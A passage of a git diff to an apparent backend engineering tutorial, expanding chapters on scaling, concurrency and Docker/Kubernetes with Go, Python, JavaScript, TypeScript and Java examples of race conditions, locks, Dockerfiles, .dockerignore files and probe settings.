+        executor.setRejectedExecutionHandler(new ThreadPoolExecutor.CallerRunsPolicy());
+        return executor;
+    }
+}
+
+// The limitation is the one that matters: @Async runs IN your API
+// process, so a restart loses every queued job and the work does not
+// scale independently of the web tier. For anything that must survive a
+// deploy, put it in a real broker, Redis Streams, RabbitMQ or SQS, and
+// run the worker separately. See chapter 10.
+```
+
 <Callout type="info">
-**Reference:** [Celery Documentation](https://docs.celeryq.dev/en/stable/) / [BullMQ (Node.js)](https://docs.bullmq.io/), production-grade task queues for Python and JavaScript respectively.
+**Reference:** [Celery](https://docs.celeryq.dev/en/stable/) (Python) / [BullMQ](https://docs.bullmq.io/) (Node.js) / [Asynq](https://github.com/hibiken/asynq) (Go) / [Spring Batch](https://spring.io/projects/spring-batch) and [JobRunr](https://www.jobrunr.io/) (Java), production-grade task queues. Chapter 10 covers all of them in depth.
 </Callout>
 
 ## Monoliths vs Microservices
@@ -420,7 +705,6 @@ You don't need to build for a million users on day one, most platforms never rea
 Observability is the one exception to "start simple." Production-grade logging, metrics, and tracing should be in place from the first deployment. They pay for themselves immediately, you never have to guess where a bug is, you never get surprised by a traffic spike, and you always have the data to make informed scaling decisions.
 
 ```go
-Go
 // A minimal but real observability setup: Prometheus metrics + structured logging
 import (
     "github.com/prometheus/client_golang/prometheus"
@@ -468,4 +752,4 @@ Scaling is not a one-time project. It's an ongoing practice, you build systems, 
 
 [^ Back to top](#top)
 
-Backend from First Principles / Chapter 19 / Scaling II. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 19 / Scaling II. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/20-concurrency-and-parallelism.mdx
+++ b/src/content/chapters/20-concurrency-and-parallelism.mdx
@@ -2,7 +2,7 @@
 order: 20
 title: "Concurrency & Parallelism"
 navTitle: "Concurrency & Parallelism"
-summary: "Chapter 20 of Backend from First Principles: Concurrency & Parallelism."
+summary: "Why a backend spends most of its life waiting, and the four models built to stop wasting that time: OS threads, the event loop, goroutines and virtual threads. Then the bugs concurrency creates, race conditions across a yield point, and the locks and channels that fix them. Compared across Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "concurrency"
@@ -188,7 +188,7 @@ def handle_request(conn):
 while True:
     conn = server_socket.accept()
     t = threading.Thread(target=handle_request, args=(conn,))
-    t.start()Python
+    t.start()
 ```
 
 Notice there's no `async` or `await` anywhere. The blocking happens transparently, at the OS level, when `db.execute()` makes a network call. The thread is marked as "blocked," the OS switches to another thread, and later wakes this thread up when the database response arrives on the socket.
@@ -275,7 +275,7 @@ If you run a CPU-intensive operation, say, a 100 ms image processing task, direc
 
 The event loop works on callbacks, but raw callbacks lead to deeply nested code (the infamous "callback hell"). The evolution in JavaScript went:
 
-```text
+```js title="stage 1 / callback hell"
 // Stage 1: Raw callbacks (pre-ES6)
 db.query("SELECT * FROM users WHERE id = ?", [userId],
   function(err, result) {
@@ -289,16 +289,16 @@ db.query("SELECT * FROM users WHERE id = ?", [userId],
       }
     );
   }
-);JavaScript / callback hell
+);
 ```
 
-```text
+```js title="stage 2 / async-await"
 // Stage 2: async/await (modern, syntactic sugar over callbacks)
 async function handleRequest(req, res) {
   const user  = await db.query("SELECT * FROM users WHERE id = ?", [req.userId]);
   const orders = await db.query("SELECT * FROM orders WHERE user_id = ?", [req.userId]);
   sendResponse(res, { user, orders });
-}JavaScript / async/await
+}
 ```
 
 The `await` keyword is syntactic sugar. When the runtime encounters `await`, it says: "I'm giving up control of the CPU to the event loop. Everything after this line is effectively a callback that will run when this IO operation completes."
@@ -320,7 +320,7 @@ async def handle_request(user_id: int) -> dict:
     return {"user": user, "orders": orders}
 
 # Run with an event loop (uvloop for performance)
-asyncio.run(handle_request(123))Python
+asyncio.run(handle_request(123))
 ```
 
 <Callout type="info" title="Reference">
@@ -341,12 +341,12 @@ To truly understand `async/await`, it helps to see what the compiler or runtime 
 async def fetch_user_data(user_id):
     user   = await db.get_user(user_id)      # State 0 -> 1
     orders = await db.get_orders(user_id)    # State 1 -> 2
-    return {"user": user, "orders": orders}  # State 2 -> donePython
+    return {"user": user, "orders": orders}  # State 2 -> done
 ```
 
 ### What the runtime sees (conceptual)
 
-```go
+```python title="the same function, as an explicit state machine"
 # Conceptual state machine representation
 def fetch_user_data_machine(user_id):
     state = 0
@@ -372,7 +372,7 @@ def fetch_user_data_machine(user_id):
         elif state == 2:
             return {"user": user, "orders": orders}
 
-    return stepPython / conceptual
+    return step
 ```
 
 <Diagram caption="Fig 6, Each await is a state transition; the event loop runs other work in between">
@@ -418,7 +418,7 @@ func (srv *Server) Serve(l net.Listener) error {
         // Create a NEW goroutine for each connection
         go srv.handleConn(conn)
     }
-}Go
+}
 ```
 
 The `go` keyword spawns a new goroutine. This is the equivalent of creating a thread, but at a fraction of the cost (nanoseconds vs. microseconds, kilobytes vs. megabytes).
@@ -442,7 +442,7 @@ func handleGetUser(w http.ResponseWriter, r *http.Request) {
 
     // Goroutine resumes here after DB responds
     json.NewEncoder(w).Encode(user)
-}Go
+}
 ```
 
 Notice: **no `async`, no `await`, no callbacks**. The code reads like synchronous, blocking code, because the goroutine _does_ block. But the Go runtime scheduler transparently parks it and picks up another goroutine. You get the ergonomics of blocking code with the efficiency of non-blocking IO.
@@ -483,7 +483,34 @@ Two threads both try to increment a shared counter from 0 to 1. Incrementing req
 
 ### Race conditions in async/await too
 
-You might think: "I use JavaScript / Python with async/await, there's only one thread, so no race conditions." **Wrong.** Race conditions can still occur between `await` points. Consider this Python example:
+You might think: "I use JavaScript / Python with async/await, there's only one thread, so no race conditions." **Wrong.** Race conditions can still occur between `await` points. The same bug, in all five languages:
+
+Go Python JavaScript TypeScript Java
+
+check, yield, act: the gap in the middle is where the second caller gets in
+
+```go
+var balance = 100
+
+// Go has no await, but it has the same gap: every channel receive,
+// mutex acquire and network call is a yield point at which the
+// scheduler can run the other goroutine.
+func withdraw(amount int) {
+    if balance >= amount {            // Check at time T1
+        processWithdrawal(amount)     // <- blocks here, scheduler switches
+        balance -= amount             // Deduct at time T2
+    }
+}
+
+// Both goroutines see balance=100, both pass the check,
+// both deduct 100 -> balance = -100 (invalid!)
+go withdraw(100)
+go withdraw(100)
+
+// Go will actually TELL you about this one, which none of the others
+// will:  go run -race .  reports the conflicting access and the two
+// stacks that caused it. Run your tests with -race in CI.
+```
 
 ```python
 balance = 100
@@ -499,7 +526,87 @@ async def withdraw(amount: int):
 await asyncio.gather(
     withdraw(100),
     withdraw(100),
-)Python
+)
+```
+
+```js
+let balance = 100
+
+async function withdraw(amount) {
+  if (balance >= amount) {              // Check at time T1
+    await processWithdrawal(amount)     // <- yields control here!
+    balance -= amount                   // Deduct at time T2
+  }
+}
+
+// Both promises see balance=100, both pass the check,
+// both deduct 100 -> balance = -100 (invalid!)
+await Promise.all([withdraw(100), withdraw(100)])
+
+// This is the one that surprises people most, because "JavaScript is
+// single-threaded" is usually taught as if it meant "safe". It means
+// only that no two lines run AT THE SAME INSTANT. Everything between
+// one await and the next is still interleaved with other work.
+```
+
+```ts
+let balance = 100
+
+async function withdraw(amount: number): Promise<void> {
+  if (balance >= amount) {          // Check at time T1
+    await processWithdrawal(amount) // <- yields control here!
+    balance -= amount               // Deduct at time T2
+  }
+}
+
+await Promise.all([withdraw(100), withdraw(100)]) // balance = -100
+
+// Types cannot catch this, and it is worth being honest about why: the
+// bug is not in any single line, it is in the ORDER two correct lines
+// run in. No type system in production use models that.
+//
+// What you can do is make the dangerous shape rarer. Keep the mutable
+// state out of module scope and behind an object that owns its own
+// lock, so "read it, await, write it" is not something a caller can
+// spell by accident:
+class Account {
+  #balance = 100
+  #lock = new Mutex()
+
+  async withdraw(amount: number): Promise<void> {
+    await this.#lock.runExclusive(async () => {
+      if (this.#balance < amount) throw new Error('insufficient funds')
+      await processWithdrawal(amount)
+      this.#balance -= amount
+    })
+  }
+}
+```
+
+```java
+// Java 21 virtual threads make this bug easy to hit for the same reason
+// goroutines do: blocking calls are cheap, so people write many more of
+// them, and every blocking call is a scheduling point.
+static int balance = 100;
+
+static void withdraw(int amount) {
+    if (balance >= amount) {        // Check at time T1
+        processWithdrawal(amount);  // <- blocks; the carrier thread is reused
+        balance -= amount;          // Deduct at time T2
+    }
+}
+
+try (var executor = Executors.newVirtualThreadPerTaskExecutor()) {
+    executor.submit(() -> withdraw(100));
+    executor.submit(() -> withdraw(100));
+}
+// balance = -100 (invalid!)
+
+// On the JVM there is a second, nastier layer: without synchronization
+// there is no guarantee thread B ever SEES thread A's write at all. The
+// value can sit in a core's cache or be reordered by the compiler. A
+// race here is not just interleaving, it is a visibility problem, which
+// is why `volatile` and the Java Memory Model exist.
 ```
 
 The issue: the `if` check and the deduction are separated by an `await`. Between those two points, the event loop runs the second `withdraw` call, which also sees `balance == 100` and passes the check. Both deduct, and the balance goes to **-100**.
@@ -520,28 +627,9 @@ The solutions to race conditions have been studied for decades. Here are the maj
 
 A mutex ensures that only **one thread/goroutine** can execute a critical section at a time. All others must wait until the lock is released. This is the most common synchronization primitive across all languages.
 
-#### Python: threading.Lock
+Go Python JavaScript TypeScript Java
 
-```python
-import threading
-
-counter = 0
-lock = threading.Lock()
-
-def increment():
-    global counter
-    with lock:          # Acquire lock, blocks other threads
-        counter += 1   # Only one thread executes this at a time
-                        # Lock is released automatically at end of `with`
-
-# Create 1000 threads all incrementing the same counter
-threads = [threading.Thread(target=increment) for _ in range(1000)]
-for t in threads: t.start()
-for t in threads: t.join()
-print(counter)  # Always 1000, no lost updatesPython
-```
-
-#### Go: sync.Mutex
+one holder at a time, and the release must be guaranteed
 
 ```go
 package main
@@ -568,7 +656,114 @@ func main() {
 
     wg.Wait()
     fmt.Println(counter) // Always 1000
-}Go
+}
+```
+
+```python
+import threading
+
+counter = 0
+lock = threading.Lock()
+
+def increment():
+    global counter
+    with lock:          # Acquire lock, blocks other threads
+        counter += 1   # Only one thread executes this at a time
+                        # Lock is released automatically at end of `with`
+
+# Create 1000 threads all incrementing the same counter
+threads = [threading.Thread(target=increment) for _ in range(1000)]
+for t in threads: t.start()
+for t in threads: t.join()
+print(counter)  # Always 1000, no lost updates
+```
+
+```js
+import { Mutex } from 'async-mutex'
+
+let counter = 0
+const mutex = new Mutex()
+
+async function increment() {
+  // runExclusive acquires, runs, and releases even if the body throws,
+  // which is the JavaScript equivalent of Go's `defer mu.Unlock()`.
+  await mutex.runExclusive(async () => {
+    counter += 1 // only one task is inside this at a time
+  })
+}
+
+await Promise.all(Array.from({ length: 1000 }, increment))
+console.log(counter) // Always 1000
+
+// Note what this is NOT protecting against: Node has no shared memory
+// between processes, so this lock is per-process. Two instances behind
+// a load balancer need a DISTRIBUTED lock in Redis, or better, an
+// atomic operation in the database. See chapters 08 and 09.
+```
+
+```ts
+import { Mutex } from 'async-mutex'
+
+// Wrapping the state and its lock in one object is the point: a bare
+// `counter` plus a bare `mutex` is two things a caller has to remember
+// to use together, and the whole class of bug here is somebody
+// forgetting one of them.
+class Counter {
+  #value = 0
+  readonly #mutex = new Mutex()
+
+  async increment(): Promise<void> {
+    await this.#mutex.runExclusive(() => {
+      this.#value += 1
+    })
+  }
+
+  // No lock needed to read a single number, but it would be for any
+  // multi-field invariant: reading two fields that must agree is itself
+  // a critical section.
+  get value(): number {
+    return this.#value
+  }
+}
+
+const counter = new Counter()
+await Promise.all(Array.from({ length: 1000 }, () => counter.increment()))
+console.log(counter.value) // Always 1000
+```
+
+```java
+// Three ways, in increasing order of how much you should reach for them.
+
+// 1. An atomic. For a single variable this is the right answer: it is
+//    lock-free, so there is no contention and nothing to forget.
+AtomicInteger counter = new AtomicInteger();
+
+try (var executor = Executors.newVirtualThreadPerTaskExecutor()) {
+    for (int i = 0; i < 1000; i++) {
+        executor.submit(counter::incrementAndGet);
+    }
+}
+System.out.println(counter.get()); // Always 1000
+
+// 2. An explicit lock, for a critical section spanning several lines.
+//    The unlock MUST be in a finally block: an exception between lock
+//    and unlock otherwise deadlocks every other thread forever.
+private final ReentrantLock lock = new ReentrantLock();
+
+void increment() {
+    lock.lock();
+    try {
+        counter++;
+    } finally {
+        lock.unlock(); // this is Java's `defer mu.Unlock()`
+    }
+}
+
+// 3. `synchronized`, the oldest form. Avoid it with VIRTUAL threads on
+//    Java 21: a synchronized block PINS the virtual thread to its
+//    carrier, so a blocking call inside one blocks a real OS thread and
+//    quietly undoes the reason you used virtual threads at all.
+//    (Fixed in Java 24; on 21 through 23, prefer ReentrantLock.)
 ```
 
 ### Channels: Go's preferred approach
@@ -605,10 +800,12 @@ func main() {
 
     result := <-done
     fmt.Println(result) // 1000, no race condition, no mutex needed
-}Go
+}
 ```
 
-### Python asyncio.Lock for async code
+### The async lock: a different lock for a different yield point
+
+A threading lock BLOCKS the thread that waits on it, which in async code means blocking the whole event loop and everything else it was running. Async runtimes therefore ship a second lock that suspends only the waiting task. Using the wrong one is a classic deadlock: `threading.Lock` inside a coroutine will stop the loop that was supposed to release it.
 
 ```python
 import asyncio
@@ -628,7 +825,7 @@ await asyncio.gather(
     withdraw(100),
     withdraw(100),
 )
-print(balance)  # 0, not -100Python
+print(balance)  # 0, not -100
 ```
 
 <Callout type="info" title="Reference">
@@ -699,4 +896,4 @@ Most backend applications are **overwhelmingly IO-bound**: the bottleneck is alm
 
 ---
 
-Backend from First Principles / Chapter 20 / Concurrency. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 20 / Concurrency. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 21+.

--- a/src/content/chapters/21-docker-k8s-and-ci-cd.mdx
+++ b/src/content/chapters/21-docker-k8s-and-ci-cd.mdx
@@ -2,7 +2,7 @@
 order: 21
 title: "Docker, K8s & CI/CD"
 navTitle: "Docker, K8s & CI/CD"
-summary: "A first-principles walkthrough of how backend code gets packaged and run in production, from the kernel features that make a container (namespaces and cgroups), through Docker images, layers and multi-stage builds, into Kubernetes orchestration (pods, deployments, services, probes, autoscaling), and out to CI/CD pipelines and zero-downtime rollouts. Written to explain not just what each piece does but why it exists and how it works underneath. Application examples in both Go and Python."
+summary: "A first-principles walkthrough of how backend code gets packaged and run in production, from the kernel features that make a container (namespaces and cgroups), through Docker images, layers and multi-stage builds, into Kubernetes orchestration (pods, deployments, services, probes, autoscaling), and out to CI/CD pipelines and zero-downtime rollouts. Written to explain not just what each piece does but why it exists and how it works underneath. Application examples in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "docker"
@@ -105,13 +105,13 @@ Anything a container writes to its own filesystem dies with the container. Logs,
 
 ## The Dockerfile
 
-A **Dockerfile** is the recipe that builds an image: a sequence of instructions, executed top to bottom, _each producing one layer_ (sec 04). `docker build` reads it, runs each step, and caches the result. Because the file is plain text in your repo, your build is reproducible and reviewable, the environment becomes code. Here is the same web service containerized in Go and in Python:
+A **Dockerfile** is the recipe that builds an image: a sequence of instructions, executed top to bottom, _each producing one layer_ (sec 04). `docker build` reads it, runs each step, and caches the result. Because the file is plain text in your repo, your build is reproducible and reviewable, the environment becomes code. Here is the same web service containerized five times over. Read one tab and then another: the instructions are identical in order and purpose, and only the toolchain changes.
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
-```dockerfile
+```dockerfile tab="Go"
 # FROM picks the base image, the first (bottom) layer. Pin a version, never :latest
 FROM golang:1.22
 
@@ -133,7 +133,7 @@ EXPOSE 8080
 CMD ["/server"]
 ```
 
-```dockerfile
+```dockerfile tab="Python"
 # Pin a slim base, smaller and fewer CVEs than the full image
 FROM python:3.11-slim
 
@@ -150,6 +150,87 @@ EXPOSE 8080
 
 # Exec form (JSON array), runs the process directly as PID 1, so signals work (sec  graceful shutdown)
 CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "8080"]
+```
+
+```dockerfile tab="JavaScript"
+# Pin a slim base, smaller and fewer CVEs than the full image
+FROM node:20-slim
+
+WORKDIR /app
+
+# Copy the manifests FIRST so the dependency layer caches across code edits (sec 7)
+COPY package.json package-lock.json ./
+# `npm ci` not `npm install`: ci installs exactly the lockfile, and fails
+# if the lockfile is stale. A build must never silently resolve new versions.
+RUN npm ci --omit=dev
+
+# Then copy the application code
+COPY . .
+
+EXPOSE 8080
+
+# The node image already has a non-root `node` user (sec 17)
+USER node
+
+# Exec form, and NODE runs directly as PID 1 so it receives SIGTERM
+# itself. Wrapping this in `npm start` puts npm at PID 1, npm does not
+# forward signals, and graceful shutdown (chapter 16) silently stops working.
+CMD ["node", "server.js"]
+```
+
+```dockerfile tab="TypeScript"
+# TypeScript adds one thing the others do not have: a COMPILE step whose
+# output is all you want to ship. That makes the two-stage split below
+# not an optimisation but the natural shape.
+FROM node:20-slim AS builder
+
+WORKDIR /app
+
+COPY package.json package-lock.json ./
+RUN npm ci                       # ALL deps, including typescript itself
+
+COPY tsconfig.json ./
+COPY src ./src
+RUN npm run build                # tsc -> ./dist
+
+# ---- runtime: production deps + compiled JS only ----
+FROM node:20-slim
+
+WORKDIR /app
+ENV NODE_ENV=production
+
+COPY package.json package-lock.json ./
+RUN npm ci --omit=dev            # no typescript, no @types/*, no test runner
+
+COPY --from=builder /app/dist ./dist
+
+EXPOSE 8080
+USER node
+CMD ["node", "dist/server.js"]
+```
+
+```dockerfile tab="Java"
+# Pin the JDK for building; the JRE is enough to run (see multi-stage below)
+FROM eclipse-temurin:21-jdk
+
+WORKDIR /app
+
+# Copy the build files FIRST and warm the dependency cache (sec 7).
+# Gradle and Maven both download a great deal; this layer is the one
+# you most want to keep.
+COPY gradlew ./
+COPY gradle ./gradle
+COPY build.gradle settings.gradle ./
+RUN ./gradlew dependencies --no-daemon
+
+# Then copy the source and build the jar
+COPY src ./src
+RUN ./gradlew bootJar --no-daemon
+
+EXPOSE 8080
+
+# Exec form, java as PID 1 so it receives SIGTERM directly (chapter 16)
+CMD ["java", "-jar", "build/libs/app.jar"]
 ```
 
 | Instruction          | What it does                                                                                             |
@@ -176,9 +257,9 @@ The single most impactful technique for production images. The problem: _buildin
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
-```dockerfile
+```dockerfile tab="Go"
 # ---- Stage 1: build with the full Go toolchain ----
 FROM golang:1.22 AS builder
 WORKDIR /app
@@ -197,7 +278,7 @@ ENTRYPOINT ["/server"]
 # Result: a ~10-15 MB image with no shell, no package manager, minimal CVEs
 ```
 
-```dockerfile
+```dockerfile tab="Python"
 # ---- Stage 1: install deps into a venv with build tools available ----
 FROM python:3.11 AS builder
 WORKDIR /app
@@ -218,7 +299,98 @@ EXPOSE 8080
 CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "8080"]
 ```
 
-Go compiles to a single static binary, so the final stage can be near-empty (distroless/scratch). Python needs the interpreter, so the win comes from copying a pre-built virtualenv into a `-slim` base instead of carrying the compilers.
+```dockerfile tab="JavaScript"
+# ---- Stage 1: install ALL deps (some need a compiler for native modules) ----
+FROM node:20 AS builder
+WORKDIR /app
+COPY package.json package-lock.json ./
+RUN npm ci
+
+# ---- Stage 2: slim runtime, production deps only, non-root ----
+FROM node:20-slim
+WORKDIR /app
+ENV NODE_ENV=production
+
+# Reinstall with --omit=dev rather than copying node_modules across:
+# the dev tree contains test runners, linters and their transitive
+# dependencies, which is often more than half the image.
+COPY package.json package-lock.json ./
+RUN npm ci --omit=dev && npm cache clean --force
+
+COPY . .
+EXPOSE 8080
+USER node                                # never run as root (sec 17)
+CMD ["node", "server.js"]
+# Result: ~200 MB. Node ships an interpreter, so there is no scratch
+# option here, but the dev toolchain is gone.
+```
+
+```dockerfile tab="TypeScript"
+# ---- Stage 1: compile with the full toolchain ----
+FROM node:20 AS builder
+WORKDIR /app
+COPY package.json package-lock.json ./
+RUN npm ci                               # includes typescript, @types/*
+COPY tsconfig.json ./
+COPY src ./src
+RUN npm run build                        # tsc -> ./dist
+
+# ---- Stage 2: production deps ----
+FROM node:20 AS deps
+WORKDIR /app
+COPY package.json package-lock.json ./
+RUN npm ci --omit=dev
+
+# ---- Stage 3: distroless runtime, no shell, no npm, non-root ----
+FROM gcr.io/distroless/nodejs20-debian12:nonroot
+WORKDIR /app
+COPY --from=deps    /app/node_modules ./node_modules
+COPY --from=builder /app/dist ./dist     # copy ONLY the compiled output
+COPY package.json ./
+EXPOSE 8080
+# The distroless node image has node as its entrypoint already
+CMD ["dist/server.js"]
+# Result: no shell for an attacker, and none of the source or the
+# compiler is in the shipped image.
+```
+
+```dockerfile tab="Java"
+# ---- Stage 1: build the jar with the full JDK ----
+FROM eclipse-temurin:21-jdk AS builder
+WORKDIR /app
+COPY gradlew ./
+COPY gradle ./gradle
+COPY build.gradle settings.gradle ./
+RUN ./gradlew dependencies --no-daemon
+COPY src ./src
+RUN ./gradlew bootJar --no-daemon
+
+# ---- Stage 2: explode the jar so the layers cache properly ----
+# A Spring Boot fat jar is one ~60 MB file, so ANY code change
+# invalidates the whole layer. Exploding it separates the dependencies
+# (which rarely change) from your classes (which change every commit).
+FROM eclipse-temurin:21-jdk AS extractor
+WORKDIR /app
+COPY --from=builder /app/build/libs/app.jar app.jar
+RUN java -Djarmode=layertools -jar app.jar extract
+
+# ---- Stage 3: JRE only, no compiler, non-root ----
+FROM eclipse-temurin:21-jre
+WORKDIR /app
+COPY --from=extractor /app/dependencies/ ./
+COPY --from=extractor /app/spring-boot-loader/ ./
+COPY --from=extractor /app/snapshot-dependencies/ ./
+COPY --from=extractor /app/application/ ./   # your code: the top, smallest layer
+
+EXPOSE 8080
+USER 1000:1000                               # never run as root (sec 17)
+ENTRYPOINT ["java", "org.springframework.boot.loader.launch.JarLauncher"]
+# Result: ~250 MB with the JRE. For a genuinely small Java image,
+# GraalVM native-image compiles to a static binary and gets you into
+# distroless/static territory alongside Go.
+```
+
+The size you can reach depends on what the language needs at run time. Go compiles to a single static binary, so its final stage can be near-empty (distroless/scratch, ~15 MB). Python, Node and Java all need a runtime, so the win there is discarding the **build** toolchain: a pre-built virtualenv into a `-slim` base, production-only `node_modules`, or a JRE instead of the JDK. In every case the rule is identical, copy the finished artifact into a clean stage and leave the compiler behind.
 
 Why this matters in production
 
@@ -242,15 +414,91 @@ Docker caches each layer and reuses it on the next build _as long as that instru
 - **`.dockerignore`**: keeps junk out of the build context and the image (faster builds, smaller images, no secrets leaking in).
 - **Combine related `RUN`s & clean up in the same layer**: deleting a cache in a _later_ layer doesn't shrink the image (the bytes still live in the earlier layer); clean within the same `RUN`.
 
-```text title=".dockerignore / trim the build context"
+● Go● Python● JavaScript● TypeScript● Java
+
+what counts as junk depends on the toolchain
+
+```text tab="Go" title=".dockerignore / trim the build context"
 .git
-node_modules
 *.md
 .env            # never bake secrets into an image (sec 16)
-**/__pycache__
 *.log
-dist/
 .vscode/
+
+# Go-specific: the build happens INSIDE the image, so a binary compiled
+# on your laptop must not be copied in. It is built for the wrong OS
+# half the time, and it silently shadows the one the Dockerfile builds.
+/server
+*.test
+vendor/         # only if you are NOT using vendored deps
+```
+
+```text tab="Python" title=".dockerignore / trim the build context"
+.git
+*.md
+.env            # never bake secrets into an image (sec 16)
+*.log
+.vscode/
+
+# Python-specific: bytecode is built for the interpreter that produced
+# it, so copying it in is at best useless and at worst a stale-import bug.
+**/__pycache__
+*.py[cod]
+.venv/          # the venv is built in the image, never copied in
+.pytest_cache/
+.mypy_cache/
+htmlcov/
+```
+
+```text tab="JavaScript" title=".dockerignore / trim the build context"
+.git
+*.md
+.env            # never bake secrets into an image (sec 16)
+*.log
+.vscode/
+
+# node_modules is the single most important line in this file. It is
+# usually the largest directory in the repo, and copying it in ALSO
+# breaks native modules: they are compiled for your laptop's OS and
+# architecture, not the image's.
+node_modules
+npm-debug.log
+coverage/
+.nyc_output/
+```
+
+```text tab="TypeScript" title=".dockerignore / trim the build context"
+.git
+*.md
+.env            # never bake secrets into an image (sec 16)
+*.log
+.vscode/
+
+node_modules
+coverage/
+
+# TypeScript-specific: dist/ is produced by the builder stage, so a
+# stale local build must not be copied over it. This is the one that
+# bites hardest, because the image runs and serves LAST WEEK's code.
+dist/
+*.tsbuildinfo
+```
+
+```text tab="Java" title=".dockerignore / trim the build context"
+.git
+*.md
+.env            # never bake secrets into an image (sec 16)
+*.log
+.vscode/
+
+# Build output, produced inside the image by Gradle or Maven
+build/
+target/
+*.jar
+!gradle/wrapper/gradle-wrapper.jar   # except the wrapper, which IS needed
+
+# The Gradle cache is large and machine-specific
+.gradle/
 ```
 
 Cleanup must be in the same layer
@@ -329,7 +577,7 @@ Treat containers as disposable and keep all durable state in volumes or external
 
 Running a real app means several containers, API, database, cache, maybe a worker (the task-queue chapter's setup), with the right networks, volumes, env, and start order. Wiring that by hand with many `docker run` commands is tedious and error-prone. **Docker Compose** declares the whole local stack in one YAML file and brings it up with a single command. It's the standard for local development and simple single-host deployments.
 
-```go title="compose.yaml / an API (your Go or Python service), Postgres, and Redis"
+```yaml title="compose.yaml / an API, Postgres, and Redis"
 services:
   api:
     build: .                      # build the image from the local Dockerfile (sec 5/6)
@@ -540,7 +788,7 @@ An image must be **environment-agnostic**: the _same_ tested image runs in dev, 
 <svg viewBox="0 0 720 180" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="One image combined with different ConfigMaps and Secrets to run in dev, staging and production"><rect x="280" y="20" width="160" height="40" rx="9" fill="var(--dg-inverse)"></rect><text x="360" y="38" font-size="11" font-weight="700" fill="var(--dg-on-inverse)" text-anchor="middle">one tested image</text><text x="360" y="53" class="mono" font-size="8.5" fill="var(--dg-on-inverse-info)" text-anchor="middle">myapp:1.4.0</text><defs><marker id="ca" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-ok)"></path></marker></defs><g stroke="var(--dg-ok)" stroke-width="1.5" fill="none"><path d="M300 60 C220 80 180 92 140 100" marker-end="url(#ca)"></path><path d="M360 62 V100" marker-end="url(#ca)"></path><path d="M420 60 C500 80 540 92 580 100" marker-end="url(#ca)"></path></g><rect x="40" y="104" width="200" height="58" rx="10" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="140" y="126" font-size="11" font-weight="700" fill="var(--dg-ok)" text-anchor="middle">dev</text><text x="140" y="144" class="mono" font-size="8.5" fill="var(--dg-ink-2)" text-anchor="middle">+ ConfigMap-dev + Secret-dev</text><rect x="260" y="104" width="200" height="58" rx="10" fill="var(--dg-warn-surface)" stroke="var(--dg-warn)"></rect><text x="360" y="126" font-size="11" font-weight="700" fill="var(--dg-warn)" text-anchor="middle">staging</text><text x="360" y="144" class="mono" font-size="8.5" fill="var(--dg-ink-2)" text-anchor="middle">+ ConfigMap-stg + Secret-stg</text><rect x="480" y="104" width="200" height="58" rx="10" fill="var(--dg-accent-surface)" stroke="var(--dg-accent)"></rect><text x="580" y="126" font-size="11" font-weight="700" fill="var(--dg-accent-2)" text-anchor="middle">production</text><text x="580" y="144" class="mono" font-size="8.5" fill="var(--dg-ink-2)" text-anchor="middle">+ ConfigMap-prod + Secret-prod</text></svg>
 </Diagram>
 
-```text title="configmap + secret, injected as env vars"
+```yaml title="configmap + secret, injected as env vars"
 apiVersion: v1
 kind: ConfigMap
 metadata: { name: api-config }
@@ -584,7 +832,11 @@ For self-healing and zero-downtime to work, Kubernetes needs to know two things 
 
 A **request** is the amount the scheduler reserves for a container (and uses to pick a node); a **limit** is the hard ceiling the runtime enforces via cgroups. Exceed a CPU limit and the container is _throttled_; exceed a memory limit and it's _killed_ (`OOMKilled`). Setting these well is the difference between a stable cluster and noisy-neighbor chaos, and they feed autoscaling (sec 18).
 
-```text title="probes + resources in the container spec"
+● Go● Python● JavaScript● TypeScript● Java
+
+the probe paths and the memory numbers both depend on the runtime
+
+```yaml tab="Go" title="probes + resources in the container spec"
 # ...inside the Deployment's containers: entry (sec 14)
           livenessProbe:
             httpGet: { path: /healthz, port: 8080 }   # wedged? -> restart
@@ -596,6 +848,99 @@ A **request** is the amount the scheduler reserves for a container (and uses to 
           resources:
             requests: { cpu: "100m", memory: "128Mi" } # scheduler reserves this
             limits:   { cpu: "500m", memory: "256Mi" } # cgroup ceiling; over memory -> OOMKilled
+          # Go starts in milliseconds, so a startupProbe is rarely needed
+          # and initialDelaySeconds can stay small.
+```
+
+```yaml tab="Python" title="probes + resources in the container spec"
+# ...inside the Deployment's containers: entry (sec 14)
+          livenessProbe:
+            httpGet: { path: /healthz, port: 8080 }
+            initialDelaySeconds: 10                    # interpreter + imports
+            periodSeconds: 10
+          readinessProbe:
+            httpGet: { path: /ready, port: 8080 }
+            periodSeconds: 5
+          resources:
+            requests: { cpu: "200m", memory: "256Mi" }
+            limits:   { cpu: "1000m", memory: "512Mi" }
+          # Size the CPU limit against the worker count, not the other
+          # way round: uvicorn/gunicorn with 4 workers on a 500m limit
+          # spends its life being throttled by the cgroup.
+          env:
+            - name: WEB_CONCURRENCY
+              value: "2"
+```
+
+```yaml tab="JavaScript" title="probes + resources in the container spec"
+# ...inside the Deployment's containers: entry (sec 14)
+          livenessProbe:
+            httpGet: { path: /healthz, port: 8080 }
+            initialDelaySeconds: 5
+            periodSeconds: 10
+          readinessProbe:
+            httpGet: { path: /ready, port: 8080 }
+            periodSeconds: 5
+          resources:
+            requests: { cpu: "100m", memory: "256Mi" }
+            limits:   { cpu: "500m", memory: "512Mi" }
+          env:
+            # V8 does NOT read the cgroup limit. Left alone it sizes its
+            # heap against the NODE's total memory, grows past the
+            # container limit, and is OOMKilled with no JS error at all.
+            # Set it to roughly 75% of the memory limit.
+            - name: NODE_OPTIONS
+              value: "--max-old-space-size=384"
+```
+
